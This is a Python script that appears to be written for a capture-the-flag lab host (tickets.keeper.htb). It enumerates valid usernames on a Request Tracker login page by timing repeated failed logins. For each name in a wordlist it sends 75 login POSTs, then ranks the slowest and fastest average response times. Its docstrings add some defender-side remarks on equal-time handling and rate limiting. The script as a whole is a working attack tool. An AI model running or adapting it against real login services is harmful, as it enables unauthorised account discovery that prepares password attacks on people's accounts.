## Note: For legal purposes only
import requests
import os
# CONFIG
# Candidate account names, read one per line.
WORDLIST = "/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt"
# Login form URL that every timing sample is POSTed to.
ADDRESS = "http://tickets.keeper.htb/rt/NoAuth/Login.html"
# Samples taken per candidate name: higher will produce more accurate results
# but also takes longer. Total traffic is REQUESTCOUNT times the wordlist length.
REQUESTCOUNT = 75
def avgResponseTime(username):
    """Return the mean round-trip time, in seconds, of repeated login POSTs.

    Submits ``username`` together with the fixed password ``"pass"`` to
    ``ADDRESS`` exactly ``REQUESTCOUNT`` times and averages
    ``response.elapsed`` over those attempts. The status code and body of the
    responses are never looked at; only the timing is used.

    Reading this from the server side: the measurement is only meaningful if
    the login handler spends a different amount of time on existing and
    unknown accounts (NOTE(review): presumably true for this target; nothing
    in this file confirms it). Doing the same work on both paths, and
    throttling or locking out repeated failures, removes or blunts that
    difference.

    Args:
        username: account name placed in the ``user`` form field.

    Returns:
        Sum of the elapsed seconds divided by ``REQUESTCOUNT``.
    """
    form_fields = {"user": username, "password": "pass"}
    elapsed_total = 0
    for _ in range(REQUESTCOUNT):
        # NOTE(review): no timeout is passed, so a stalled connection blocks
        # the whole run at this call.
        reply = requests.post(ADDRESS, data=form_fields)
        elapsed_total += reply.elapsed.total_seconds()
    return elapsed_total / REQUESTCOUNT
def exploit():
    """Time every name in ``WORDLIST`` and return the per-name averages.

    The wordlist is read twice: once to count lines so the total number of
    requests can be announced, and once to measure each name with
    ``avgResponseTime``. Names are processed one after another, so the run
    shows up on the server as ``REQUESTCOUNT`` consecutive login POSTs per
    wordlist line, all to the same URL. That volume is what failed-login
    alerting and per-client rate limiting have to catch.

    Exits with status 1 when the wordlist is empty or when no result was
    collected.

    Returns:
        dict mapping each raw wordlist line (its trailing newline is kept in
        the key) to the mean response time measured for the stripped name.
        Duplicate lines overwrite each other.
    """
    print("[+] start exploit")
    results = {}

    # Refuse to continue on a zero-byte wordlist.
    if not os.stat(WORDLIST).st_size:
        print("Error: Aborting because file is empty")
        exit(1)

    # First pass: count lines only, to report the size of the run up front.
    num_lines = 0
    with open(WORDLIST, 'r') as counter_fh:
        for _ in counter_fh:
            num_lines += 1
    print("[+] ", REQUESTCOUNT * num_lines, " requests to send in total", sep="")

    # Second pass: measure each candidate and echo the result as it arrives.
    with open(WORDLIST, "r") as wordlist_fh:
        for raw_line in wordlist_fh:
            candidate = raw_line.strip()
            results[raw_line] = avgResponseTime(candidate)
            print("[+] ", candidate.ljust(13), " : ", results[raw_line], sep="")

    if not results:
        print("Error: Something went wrong. Check internet conenction maybe")
        exit(1)
    return results
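def analyze(timelist):
    """Print summary statistics for the averages collected by ``exploit``.

    Prints the total request count, the total time spent, the mean over all
    entries, the three slowest entries and the two fastest entries.

    The ranked entries are taken from a sorted view of the data. The earlier
    single-pass comparison never demoted the previous leader when a new
    maximum or minimum was found, so the second and third lines could show
    entries that were not the real runners-up. With fewer than three (or two)
    entries, only the ranks that exist are printed. Ties keep wordlist order.

    Args:
        timelist: dict mapping a wordlist line to its mean response time in
            seconds.
    """
    if not timelist:
        # Nothing to rank or average; avoid indexing into an empty dict.
        print("[+] Stats:\n")
        print("- no timing data to analyze")
        return

    overallTimePass = 0.0
    avgTimeOverAll = 0.0
    for seconds in timelist.values():
        # Each stored value is a mean over REQUESTCOUNT requests, so scaling
        # it back up gives the time actually spent on that entry.
        overallTimePass += seconds * REQUESTCOUNT
        avgTimeOverAll += seconds
    avgTimeOverAll /= len(timelist)

    def by_seconds(entry):
        return entry[1]

    # sorted() is stable, also with reverse=True, so the first of two equal
    # times is listed first in both rankings.
    slowest = sorted(timelist.items(), key=by_seconds, reverse=True)[:3]
    fastest = sorted(timelist.items(), key=by_seconds)[:2]

    print("[+] Stats:\n")
    print("- send "+str(len(timelist)*REQUESTCOUNT)+" requests total")
    print("- overall "+str(overallTimePass)+" seconds used")
    print("- average time over all: "+str(avgTimeOverAll)+" seconds")
    print("- highest times:")
    for rank, (name, seconds) in enumerate(slowest, start=1):
        # Keys still carry the wordlist's trailing newline; strip for display.
        print(str(rank)+". "+str(name).strip()+" : "+str(seconds))
    print("- lowest times:")
    for rank, (name, seconds) in enumerate(fastest, start=1):
        print(str(rank)+". "+str(name).strip()+" : "+str(seconds))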
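def main():
    """Collect the per-name timings, then print the statistics for them."""
    tl = exploit()
    print("\n[+] exploit ran successfully")
    analyze(tl)
    print("\n[+] Finished. Bye")


# Start only when executed as a script. Without this guard, merely importing
# the module would send the full request run to the configured host.
if __name__ == "__main__":
    main()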